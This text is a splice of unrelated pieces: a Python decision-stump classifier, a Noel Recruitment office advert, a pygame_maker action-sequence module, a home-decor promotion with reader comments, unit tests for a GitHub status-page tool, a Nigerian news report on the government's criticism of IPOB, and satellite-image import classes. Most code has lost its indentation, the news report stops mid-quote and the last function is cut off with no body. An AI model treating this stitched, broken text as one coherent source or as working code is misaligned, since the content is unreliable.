import numpy
class DecisionStump():
""" Class for a decision stump, adapted from pyclassic. """
def fit(self, X, Y, w):
feature_index, stump = train_decision_stump(X,Y,w)
self.feature_index = feature_index
self.stump = stump
return self
def predict(self,X):
if len(X.shape)==1:
X = numpy.array([X])
N, d = X.shape
feature_index = self.feature_index
threshold = self.stump.threshold
s = self.stump.s
return s*(2.0*(X[:,feature_index]>threshold).astype(numpy.uint8)-1)
class Stump:
"""1D stump"""
def __init__(self, score, threshold, s):
self.score = score
self.threshold = threshold
self.s = s
    def __cmp__(self, other):
        # Python 2 ordering hook; compare stumps by their score attribute
        # (the original referenced a nonexistent ``err`` attribute).
        return cmp(self.score, other.score)
def train_decision_stump(X,Y,w):
stumps = [build_stump_1d(x,Y,w) for x in X.T]
feature_index = numpy.argmax([s.score for s in stumps])
    best_stump = stumps[feature_index]
    return feature_index, best_stump
def build_stump_1d(x,y,w):
idx = x.argsort()
xsorted = x[idx]
wy = y[idx]*w[idx]
wy_pos = numpy.clip(wy, a_min=0, a_max=numpy.inf)
wy_neg = numpy.clip(wy, a_min=-numpy.inf, a_max=0)
score_left_pos = numpy.cumsum(wy_pos)
score_right_pos = numpy.cumsum(wy_pos[::-1])
score_left_neg = numpy.cumsum(wy_neg)
score_right_neg = numpy.cumsum(wy_neg[::-1])
score1 = -score_left_pos[0:-1:1] + score_right_neg[-2::-1]
score2 = -score_left_neg[0:-1:1] + score_right_pos[-2::-1]
# using idx will ensure that we don't split between nodes with identical x values
idx = numpy.nonzero((xsorted[:-1] < xsorted[1:]).astype(numpy.uint8))[0]
if len(idx)==0:
return Stump(-numpy.inf, 0, 0)
score = numpy.where(abs(score1)>abs(score2), score1, score2)
ind = idx[numpy.argmax(abs(score[idx]))]
maxscore = abs(score[ind])
threshold = (xsorted[ind] + xsorted[ind+1])/2.0
s = numpy.sign(score[ind]) # direction of -1 -> 1 change
return Stump(maxscore, threshold, s)
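if __name__ == "__main__":
    # Illustrative smoke test (not part of the original module): fit a stump
    # on synthetic, linearly separable data and check training accuracy.
    rng = numpy.random.RandomState(0)
    X = rng.randn(20, 2)
    Y = numpy.where(X[:, 0] > 0.0, 1, -1)
    w = numpy.ones(20) / 20.0
    stump = DecisionStump().fit(X, Y, w)
    print("split on feature %d at %.3f" % (stump.feature_index, stump.stump.threshold))
    print("training accuracy: %.2f" % (stump.predict(X) == Y).mean())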
Longstanding recruitment firm, Noel Recruitment, has opened a brand new office on Tullamore's main street.
With over 30 years’ experience in the recruitment industry, providing resources to many of the leading brands in Ireland, the Noel Group is one of Ireland’s best recognised and largest recruitment organisations.
With seven specialised brands operating from 11 locations throughout Ireland, their industry-specific recruiters supply your business with the people who are best suited to your requirements.
With offices in Galway, Waterford, Limerick, Cork, Naas, Co Kildare, Dublin – Dawson Street, Tallaght and Santry, and now on Main Street, Tullamore, Noel can guarantee efficiency, excellent customer service and reliability: a recruitment company you will want to recommend.
As an employer, whether you require a recruitment service for temporary or permanent positions or are seeking a recruitment partner to supply and manage a flexible workforce, we can support you. Whether you are one of Ireland’s leading multinational employers or a growing SME, we at the Noel Group can meet your requirements.
With a network of 10 offices in Ireland and over 100 permanent staff, our 24/7 service offers each customer a variety of services, from tailored permanent recruitment campaigns to high-volume temporary supply solutions. As a customer using our services you will benefit on site from a well-prepared and experienced account management structure taking care of everything from inductions to check-ins, appraisals, disciplinary matters and full payroll production, working to ISO 9001 service requirements.
Our team at the Noel Group works with companies right across the country to match you with the job you are looking for. Whether it be a permanent, temporary or contract position, we will ensure that you, as our candidate, are well prepared and supported throughout the process.
How can you register with Noel Group?
Longford – EDI Centre, Athlone Road Longford, Thursday, March 28 - 10am – 4pm.
"""
Author: Ron Lockwood-Childs
Licensed under LGPL v2.1 (see file COPYING for details)
Container type for sequences of actions.
"""
import re
from pygame_maker.actions.action import Action, ActionException
__all__ = ["ActionSequence", "ActionSequenceStatement",
"ActionSequenceConditional", "ActionSequenceConditionalIf",
"ActionSequenceConditionalElse", "ActionSequenceBlock",
"ActionSequenceStatementException"]
class ActionSequenceStatementException(Exception):
"""
    Raised when an unknown action name or something other than an action is
    found in a sequence, when sequence statements are placed incorrectly, or
    when an attempt is made to add something other than an
    ActionSequenceStatement to a sequence.
"""
pass
class ActionSequenceStatement(object):
"""
The base class for all action sequence statements.
A "statement" wraps an action and provides structure to represent if/else
conditionals and blocks along with normal executable statements.
:param action: The action to wrap into the statement
:type action: Action
"""
@staticmethod
def get_sequence_item_from_action(action, **kwargs):
"""
Given a name or Action, retrieve its ActionSequenceStatement.
Provide a simple static method to retrieve the right statement
representing the given action: if/else condition, block, or
executable statement. Can also accept a string containing the name
of the action, in which case a new action will be retrieved with
its parameters filled in with the supplied kwargs.
:param action: An action name, or Action instance
:type action: str|Action
:param kwargs: Optional keyword arguments to apply to the named action
:return: The appropriate action sequence statement
:rtype: ActionSequenceStatement
"""
# if given a string, see if it names a known action
new_action = None
if isinstance(action, str):
try:
new_action = Action.get_action_instance_by_name(action, **kwargs)
except ActionException:
raise ActionSequenceStatementException("'{}' is not a known action".format(action))
else:
new_action = action
        if not isinstance(new_action, Action):
            raise ActionSequenceStatementException(
                "'{}' is not a recognized action".format(action))
if new_action.nest_adjustment:
if new_action.name == "else":
return ActionSequenceConditionalElse(new_action)
minfo = Action.IF_STATEMENT_RE.search(new_action.name)
if minfo:
return ActionSequenceConditionalIf(new_action)
if new_action.nest_adjustment != "block_end":
return ActionSequenceBlock(new_action)
return ActionSequenceStatement(new_action)
def __init__(self, action):
self.is_block = False
self.is_conditional = False
self.action = action
def get_action_list(self):
"""
Return the statement's action list.
This method places the action inside a list of length 1.
This aids with unit testing, and it allows an action sequence to be
serialized to storage. The deserialized simple list can be expanded
into an action sequence when the application starts up.
:return: A single-element list containing the wrapped action
:rtype: list
"""
return [self.action]
def pretty_print(self, indent=0):
"""
Display the name of the wrapped action as indented code
        :param indent: Number of tab stops to indent
:type indent: int
"""
indent_string = "\t" * indent
print("{}{}".format(indent_string, self.action.name))
def __repr__(self):
return "<{}: {}>".format(type(self).__name__, self.action)
class ActionSequenceConditional(ActionSequenceStatement):
"""
Represent a simple conditional ('else' is the only kind this fits).
:param action: The action to wrap into the conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceStatement.__init__(self, action)
self.is_conditional = True
self.contained_statement = None
def add_statement(self, statement):
"""
Attempt to add a statement to the conditional.
Given a statement, try to add it to the current conditional. If the
clause is empty, set its statement. If the clause holds an open
block or conditional, pass it on.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
# basic type check
if not isinstance(statement, ActionSequenceStatement):
raise ActionSequenceStatementException
if not self.contained_statement:
# the statement is now the conditional clause
self.contained_statement = statement
elif (self.contained_statement.is_block and
not self.contained_statement.is_block_closed):
# the statement fits within the conditional clause's block
self.contained_statement.add_statement(statement)
elif (self.contained_statement.is_conditional and
self.contained_statement.add_statement(statement)):
# the contained conditional found a place for the statement
pass
else:
found_place = False
return found_place
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a simple
conditional into a simple list. This aids with unit testing and
allows an action sequence to be serialized to storage. The
deserialized simple list can be expanded into an action sequence
when the application starts up.
:return: A list containing the conditional's wrapped actions
:rtype: list
"""
contained_list = []
if self.contained_statement:
contained_list = self.contained_statement.get_action_list()
return [self.action] + contained_list
def pretty_print(self, indent=0):
"""
Display an action sequence simple conditional as indented code
        :param indent: Number of tab stops to indent
:type indent: int
"""
ActionSequenceStatement.pretty_print(self, indent)
if self.contained_statement:
self.contained_statement.pretty_print(indent+1)
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
repr_str += "\t{}>".format(self.contained_statement)
return repr_str
class ActionSequenceConditionalIf(ActionSequenceConditional):
"""
Represent an entire if/else conditional.
The 'else' clause is also placed here, to avoid having to search earlier
statements to see if there is a free 'if' conditional that matches the
'else'.
:param action: The action to wrap into the 'if' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
self.else_condition = None
def add_statement(self, statement):
"""
Attempt to place the given statement into the clause for the 'if'.
If there is already a block or another conditional, see if the new
statement will be accepted there. If not, check whether the new
statement is an 'else' condition, and that no 'else' condition already
exists. If there is an 'else' condition that hasn't received a
statement yet, add it there. If the 'else' statement exists and
contains another conditional or block, see if the new statement
will be accepted there.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
if not ActionSequenceConditional.add_statement(self, statement):
if (not self.else_condition and
isinstance(statement, ActionSequenceConditionalElse)):
self.else_condition = statement
elif (self.else_condition and self.else_condition.is_conditional and
self.else_condition.add_statement(statement)):
# else clause had a place for the new statement
pass
elif (self.else_condition and self.else_condition.is_block and
not self.else_condition.is_block_closed):
self.else_condition.add_statement(statement)
else:
found_place = False
return found_place
def pretty_print(self, indent=0):
"""
Display an action sequence if/else conditional as indented code.
        :param indent: Number of tab stops to indent
:type indent: int
"""
ActionSequenceConditional.pretty_print(self, indent)
if self.else_condition:
self.else_condition.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a Conditional.
:return: Generator function
:rtype: generator
"""
yield self.action
conditional_path = None
if self.action.action_result:
if not self.contained_statement:
# incomplete "if" path (can only happen to final action in list)
return
conditional_path = self.contained_statement
else:
if not self.else_condition:
# "if" not executed, and no "else" path
return
# no need to return the "else" action itself, it does nothing
conditional_path = self.else_condition.contained_statement
if conditional_path.is_block or conditional_path.is_conditional:
for action in conditional_path.walk():
yield action
else:
yield conditional_path.action
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
conditional into a simple list. This aids with unit
testing and allows an action sequence to be serialized
to storage. The deserialized simple list can be expanded into an
action sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
contained_list = ActionSequenceConditional.get_action_list(self)
else_list = []
if self.else_condition:
else_list = self.else_condition.get_action_list()
return contained_list + else_list
def __repr__(self):
repr_str = "<{} {}:\n".format(type(self).__name__, self.action)
repr_str += "\t{}\n".format(self.contained_statement)
if self.else_condition:
repr_str += "{}>".format(self.else_condition)
return repr_str
class ActionSequenceConditionalElse(ActionSequenceConditional):
"""
Clone of the ActionSequenceConditional class.
    Named for convenience to be used in an ActionSequenceConditionalIf.
:param action: The action to wrap into the 'else' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
class ActionSequenceBlock(ActionSequenceStatement):
"""
Represent a block of action statements.
All statements are placed into a block (even if just the 'main' block) or
into conditionals within a block. The first action in the main block
is set to None.
:param action: Usually a start_of_block action
:type action: Action|None
    :param main_block: True if this is the main (outermost) block
    :type main_block: bool
"""
def __init__(self, action, main_block=False):
# main block doesn't start with an explicit action, so action==None
# is ok. Remember this when trying to use self.action in any
# methods, including superclasses!
ActionSequenceStatement.__init__(self, action)
self.is_block = True
self.is_block_closed = False
self.contained_statements = []
self.main_block = main_block
def _append_statement(self, statement):
# Called by add_statement() when an action is meant for this block.
#
# :param statement: New statement to add to the block
# :type statement: ActionSequenceStatement
# the main block is never explicitly "closed"
if statement.action and statement.action.nest_adjustment == "block_end":
if not self.main_block:
self.is_block_closed = True
self.contained_statements.append(statement)
else:
raise ActionSequenceStatementException("block_end cannot be added to a main block")
elif isinstance(statement, ActionSequenceConditionalElse):
raise ActionSequenceStatementException
else:
self.contained_statements.append(statement)
def add_statement(self, statement):
"""
Add a new statement to an open block.
The action sequence "magic" happens here. Normal statements, "if"
conditionals and blocks can be added to the current block. Open
conditionals (no clause yet) or blocks (no "block_end" action) can
receive new statements. An "else" action can be attached to an "if"
conditional. All statements exist either inside a block (there is
always a "main" block) or a conditional.
:param statement: New statement to add to the block
:type statement: ActionSequenceStatement
"""
# print("Adding statement: {} .. ".format(statement))
if not isinstance(statement, ActionSequenceStatement):
raise TypeError("{} is not an ActionSequenceStatement".format(str(statement)))
last_statement = None
if self.contained_statements:
last_statement = self.contained_statements[-1]
if last_statement and last_statement.is_conditional:
# If the last statement's conditional is still open, this statement
# belongs there. Otherwise, add it to this block
if last_statement.add_statement(statement):
# print("---> to last conditional")
return
if last_statement and last_statement.is_block:
# If the last statement's block is still open, this statement
# belongs there. Otherwise, add it to this block
if not last_statement.is_block_closed:
# print("---> to last block")
last_statement.add_statement(statement)
return
# print("---> to current block")
self._append_statement(statement)
def get_action_list(self):
"""
        Collect the block's list of actions.
This method retrieves all the collected statements inside a
block into a simple list. This aids with unit testing
and allows an action sequence to be serialized to storage.
The deserialized simple list can be expanded into an action
sequence when the application starts up.
        :return: A list of the actions contained in the block
:rtype: list
"""
this_action = []
if not self.main_block:
this_action = [self.action]
contained_list = []
if self.contained_statements:
for contained in self.contained_statements:
contained_list += contained.get_action_list()
return this_action + contained_list
def pretty_print(self, indent=0):
"""
Display the action sequence block as indented code.
        :param indent: Number of tab stops to indent
:type indent: int
"""
new_indent = indent
if not self.main_block:
ActionSequenceStatement.pretty_print(self, indent)
new_indent += 1
if self.contained_statements:
for contained in self.contained_statements:
if contained.action.nest_adjustment != "block_end":
contained.pretty_print(new_indent)
else:
contained.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a block.
:return: Generator function
:rtype: generator
"""
for statement in self.contained_statements:
if statement.action is None:
continue
if statement.action.nest_adjustment == "block_end":
return
if statement.is_conditional or statement.is_block:
for sub_statement_action in statement.walk():
yield sub_statement_action
else:
yield statement.action
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
for statement in self.contained_statements:
repr_str += "{}\n".format(statement)
repr_str += ">"
return repr_str
class ActionSequence(object):
"""Store a sequence of actions, which runs when triggered by an event."""
FIRST_ITEM_RE = re.compile(r"^\s*([^ ])")
@staticmethod
def load_sequence_from_yaml_obj(sequence_repr):
"""
Create an event action sequence from its YAML representation.
The expected format is as follows::
            [{<action_name>: {<action_param>: <action_value>, ...}}, ...]
:param sequence_repr: The YAML object containing action sequence data
:type sequence_repr: yaml.load() result
:return: The action sequence described in the YAML object
:rtype: ActionSequence
"""
new_sequence = None
if sequence_repr:
new_sequence = ActionSequence()
for action_hash in sequence_repr:
action_name = list(action_hash.keys())[0]
action_params = {}
if action_hash[action_name]:
action_params.update(action_hash[action_name])
next_action = Action.get_action_instance_by_name(action_name, **action_params)
# print("New action: {}".format(next_action))
new_sequence.append_action(next_action)
return new_sequence
def __init__(self):
"""Wrap the outermost ActionSequenceBlock."""
#: The main block, containing all actions in sequence
self.main_block = ActionSequenceBlock(None, True)
def append_action(self, action):
"""
Add a new action to the end of the sequence.
:param action: The name of a defined action, or an Action instance
:type action: str|Action
"""
statement = ActionSequenceStatement.get_sequence_item_from_action(action)
self.main_block.add_statement(statement)
def get_next_action(self):
"""
Iterate through every action in the ActionSequence.
:return: Generator function
:rtype: generator
"""
for next_action in self.main_block.walk():
if next_action is not None:
yield next_action
def to_yaml(self, indent=0):
"""
Produce the YAML representation of the action sequence.
:param indent: Number of spaces to indent each line
:type indent: int
:return: YAML string
:rtype: str
"""
action_list = self.main_block.get_action_list()
sequence_yaml = ""
for action in action_list:
action_yaml_lines = action.to_yaml(indent).splitlines()
for idx, aline in enumerate(action_yaml_lines):
if idx == 0:
sline = str(aline)
minfo = self.FIRST_ITEM_RE.search(aline)
# print("first item match for '{}': {}".format(aline, minfo))
if minfo:
mpos = minfo.start(1)
# print("match pos:{}".format(mpos))
sline = "{}- {}".format(aline[0:mpos], aline[mpos:])
else:
sline = "- {}".format(aline)
sequence_yaml += "{}\n".format(sline)
else:
sequence_yaml += " {}\n".format(aline)
return sequence_yaml
def pretty_print(self):
"""Print out properly-indented action sequence strings."""
self.main_block.pretty_print()
def __repr__(self):
return "{}".format(str(self.main_block))
Spring cleaning is the perfect opportunity to de-clutter your home, replace that old worn out furniture that you’ve had for years, and accessorize! Zinc Door offers stylish and modern home decor for every room and this month they’re featuring the popular brand Noir and offering 15% off all throw pillows.
The Noir Ming Bookcase provides multiple shelves and two drawers for accessories and organizational needs. This beautifully crafted bookcase will be the focal point in any room and will provide more storage space for your beloved decorative accessories, souvenirs and awards. A home office can become easily cluttered; a simple fix is to find a desk with multiple drawers. The Noir Hammered Zinc Desk is detailed with nailheads and created from hammered zinc and old wood. This timeless furnishing offers an office six drawers of chic storage. Spring cleaning also means a new wardrobe, but who wants to part with their clothes from last year? The Noir Hampton Tall Boy Dresser provides six drawers, delivering maximum storage in a relaxed whitewashed finish.
Once your space is clean and organized, it’s time to accessorize and create a spring-fresh look! Brighten up a bedroom or living space with decorative pillows. Zinc Door offers a variety of stylish pillows and from now through 4/14, Zinc Door is offering 15% off all throw pillows with promo code throws. Adding bright and colorful accessories will help any room in your home pop!
I love how new throw pillows can freshen up any room. Thanks for sharing.
This is a nice store, thanks for this!
Thank you for that review. You just introduced me to a new place that I love!
I need to check out this site so bad! That’s such a great deal.
Would love to check this site out!! I need new throw pillow desperately!!!
Thank you for sharing. I’m in desperate need of redecorating.
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import unittest
from datetime import datetime
from unittest import TestCase
from mock import patch, Mock
from click.testing import CliRunner
from statuspage import cli, update, create, iter_systems, get_severity, SYSTEM_LABEL_COLOR
from github import UnknownObjectException
import codecs
class CLITestCase(TestCase):
def setUp(self):
self.patcher = patch('statuspage.Github')
self.gh = self.patcher.start()
# setup mocked label
self.label = Mock()
self.label.color = "171717"
self.label.name = "Website"
self.label1 = Mock()
self.label1.color = "171717"
self.label1.name = "API"
self.gh().get_user().get_repo().get_labels.return_value = [self.label, self.label1]
# set up mocked issue
self.issue = Mock()
self.issue.created_at = datetime.now()
self.issue.state = "open"
self.issue_label = Mock()
self.issue_label.color = "FF4D4D"
self.issue_label.name = "major outage"
self.issue.get_labels.return_value = [self.issue_label, self.label]
self.issue.user.login = "some-dude"
self.comment = Mock()
self.comment.user.login = "some-dude"
self.issue.get_comments.return_value = [self.comment, ]
self.issue1 = Mock()
self.issue1.created_at = datetime.now()
self.issue1.state = "open"
self.issue1.user.login = "some-dude"
self.issue1.get_labels.return_value = [self.issue_label, self.label1]
self.issue1.get_comments.return_value = [self.comment, ]
self.gh().get_user().get_repo().get_issues.return_value = [self.issue, self.issue1]
self.template = Mock()
self.template.decoded_content = b"some foo"
self.template.content = codecs.encode(b"some other foo", "base64")
self.gh().get_user().get_repo().get_file_contents.return_value = self.template
self.gh().get_organization().get_repo().get_file_contents.return_value = self.template
self.collaborator = Mock()
self.collaborator.login = "some-dude"
self.gh().get_user().get_repo().get_collaborators.return_value = [self.collaborator,]
self.gh().get_organization().get_repo().get_collaborators.return_value = [self.collaborator,]
def tearDown(self):
self.patcher.stop()
@patch("statuspage.run_update")
def test_create(self, run_update):
label = Mock()
self.gh().get_user().create_repo().get_labels.return_value = [label,]
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo", "--token", "token", "--systems", "sys1,sys2"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
@patch("statuspage.run_update")
def test_create_org(self, run_update):
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo",
"--token", "token",
"--systems", "sys1,sys2",
"--org", "some"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization.assert_called_with("some")
def test_update(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
def test_dont_update_when_nothing_changes(self):
runner = CliRunner()
self.template.content = codecs.encode(b"some foo", "base64")
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().update_file.assert_not_called()
def test_update_org(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token", "--org", "some"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization().get_repo.assert_called_with(name="testrepo")
self.gh().get_organization().get_repo().get_labels.assert_called_once_with()
def test_update_index_does_not_exist(self):
self.gh().get_user().get_repo().update_file.side_effect = UnknownObjectException(status=404, data="foo")
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().create_file.assert_called_once_with(
branch='gh-pages',
content='some foo',
message='initial',
path='/index.html'
)
def test_update_non_labeled_issue_not_displayed(self):
self.issue.get_labels.return_value = []
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
def test_update_non_colaborator_issue_not_displayed(self):
self.issue.user.login = "some-other-dude"
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
class UtilTestCase(TestCase):
def test_iter_systems(self):
label1 = Mock()
label2 = Mock()
label1.name = "website"
label1.color = SYSTEM_LABEL_COLOR
self.assertEqual(
list(iter_systems([label1, label2])),
["website", ]
)
self.assertEqual(
list(iter_systems([label2])),
[]
)
def test_severity(self):
label1 = Mock()
label2 = Mock()
label1.color = "FF4D4D"
self.assertEqual(
get_severity([label1, label2]),
"major outage"
)
label1.color = "000000"
self.assertEqual(
get_severity([label1, label2]),
None
)
if __name__ == '__main__':
    unittest.main()
The Federal Government says the Indigenous People of Biafra (IPOB) is ignorant of the depth of unity in the diversity of Nigeria.
The Minister of Information and Culture, Alhaji Lai Mohammed, stated this on Wednesday in Abuja when he featured on “Embelembe”, a phone-in radio programme on 101.1 Human Rights Radio.
The Minister faulted the group over the hate and divisive speeches of its leader, Nnamdi Kanu, its violent attacks on the military, and its extortion of innocent Nigerians at illegal roadblocks.
Giving instances, the Minister said that Kanu's call on the Igbo "not to attend any Church where the pastor is a Yoruba man" is premised on ignorance of the diversity of the country.
Mohammed said that the Mountain of Fire Ministry, established by an Igbo man, has a football club owned by a Yoruba man, with a coach of Igbo extraction and players from across all the regions and tribes of the country.
He stressed that Nigerians are so interwoven and united that a call for violent division would not succeed.
Mohammed noted that the Federal Government was not averse to agitations from any quarter, provided they are carried out in a manner that would not result in violence and war.
He commended the military, the state governors, particularly from the East and the North, the traditional rulers and religious leaders for their timely intervention to nip the crisis started by IPOB in the bud.
The Minister said the government of President Muhammadu Buhari is passionate about the plight of Nigerians and would not rest until it makes life easier for everyone.
He said as a listening government, the Administration is taking concrete steps to address the environmental degradation in the Niger Delta.
Mohammed also disclosed that no fewer than 3 million pupils were being fed in 14 states while 30,000 cooks were engaged through the Federal Government feeding programme.
He enjoined Nigerians and followers of the programme to download his ministry’s information app, "FGNiapp", to access authentic information, programmes and agenda of the government.
The anchor of the programme, Ahmed Isa, popularly called “Ordinary President”, said Nigeria’s unity is like a bunch of broom: the more and bigger it is, the better for the country.
He expressed worry over the dimension the IPOB protest was taking, stressing that government must do all within its means to address it.
Isa said: "The way things are going, I am not happy.
import pyrat, os
import logging
from osgeo import gdal
import glob
import numpy as np
class ENVISAT(pyrat.ImportWorker):
"""
Import of ENVISAT satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'ENVISAT'}
para = [{'var': 'file', 'value': '', 'type': 'openfile', 'text': 'Product file (*.N1)'}]
def __init__(self, *args, **kwargs):
super(ENVISAT, self).__init__(*args, **kwargs)
self.name = "ENVISAT IMPORT"
if len(args) == 1:
self.file = args[0]
def getsize(self, *args, **kwargs):
self.ds = gdal.Open(self.file)
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
if len(array) == 1:
return array[0]
else:
return array
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "ENVISAT"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(ENVISAT)
def envisat(*args, **kwargs):
return ENVISAT(*args, **kwargs).run(*args, **kwargs)
class PALSAR(pyrat.ImportWorker):
"""
Import of PALSAR satellite data. Only level 1.1. and 1.5 are supported.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'PALSAR'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(PALSAR, self).__init__(*args, **kwargs)
self.name = "PALSAR IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/VOL*")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: volume file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "PALSAR"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(PALSAR)
def palsar(*args, **kwargs):
return PALSAR(*args, **kwargs).run(*args, **kwargs)
class Radarsat2(pyrat.ImportWorker):
"""
Import of Radarsat-2 satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Radarsat-2'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Radarsat2, self).__init__(*args, **kwargs)
self.name = "RADARSAT-2 IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/product.xml")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: product.xml file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "Radarsat-2"
metain = self.ds.GetMetadata()
meta.update(metain)
meta['CH_pol'] = []
for band in self.band:
metain = band.GetMetadata()
meta['CH_pol'].append(metain['POLARIMETRIC_INTERP'])
meta.update(metain)
return meta
@pyrat.docstringfrom(Radarsat2)
def radarsat2(*args, **kwargs):
return Radarsat2(*args, **kwargs).run(*args, **kwargs)
class Sentinel1(pyrat.ImportWorker):
"""
Very basic import of Sentinel-1 satellite data. The current driver uses GDAL and therefore does not
perform debursting and combination of subswaths. This routine needs to be improved in future.
**author:** Andreas Reigber\n
**status:** --beta-- Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Sentinel-1 (primitive)'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
    def __init__(self, *args, **kwargs):
        super(Sentinel1, self).__init__(*args, **kwargs)
        self.name = "SENTINEL-1 IMPORT"
        # Accept the product directory positionally, as the other importers
        # in this module do.
        if len(args) == 1:
            self.dir = args[0]
def reader(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/manifest.safe")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
nswath = len(self.band)
YSize = [band.YSize for band in self.band]
XSize = [band.XSize for band in self.band]
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: manifest.save file not found!")
return False, False
array = []
for band in self.band:
array.append(band.ReadAsArray())
meta = {}
meta['sensor'] = "Sentinel-1"
metain = self.ds.GetMetadata()
meta.update(metain)
return array, meta
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def sentinel1(*args, **kwargs):
